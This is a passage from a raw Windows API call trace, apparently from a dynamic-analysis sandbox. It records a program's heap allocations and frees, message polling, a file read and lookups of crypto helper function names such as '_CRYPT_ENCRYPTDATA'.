Flags=0x0, Size=0x18) returned 0x1796fe8 [0077.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0077.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0077.264] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0077.264] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0077.264] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.265] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0077.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0077.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0077.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0077.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0077.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0077.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0077.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0077.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0077.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e08020 [0077.270] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0077.270] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x7490, lpOverlapped=0x0) returned 1 [0077.272] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0077.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0077.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0077.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7490) returned 0x48f0048 [0077.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e08020 | out: hHeap=0x1780000) returned 1 [0077.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0077.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0077.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7490) returned 0x48f74e0 [0077.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0077.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.278] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0077.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0077.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0077.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0077.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7490) returned 0x48f0048 [0077.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0077.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0077.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0077.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.279] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0077.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0077.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0077.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0077.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0077.279] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0077.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0077.279] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0077.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0077.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2620 [0077.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0077.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0077.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0077.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0077.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7490) returned 0x48f0048 [0077.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0077.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0077.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0077.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2580 [0077.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0077.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0077.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0077.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0077.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0077.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0077.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca448 [0077.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0077.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0077.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0077.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7490) returned 0x48fe978 [0077.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0077.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0077.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0077.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0077.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0077.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0077.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0077.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0077.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0077.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0077.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0077.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0077.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0077.282] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0077.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0077.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0077.282] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0077.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0077.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0077.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0077.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0077.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0077.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0077.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0077.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0077.283] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0077.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0077.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0077.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0077.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0077.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0077.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0077.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0077.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0077.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0077.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0077.283] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0077.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0077.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.284] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0077.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0077.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0077.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0077.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.285] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0077.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0077.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0077.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0077.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0077.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0077.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0077.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0077.286] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0077.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca598 [0077.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0077.286] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0077.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0077.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0077.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0077.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0077.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0077.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0077.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0077.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0077.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0077.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0077.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0077.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0077.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0077.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0077.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 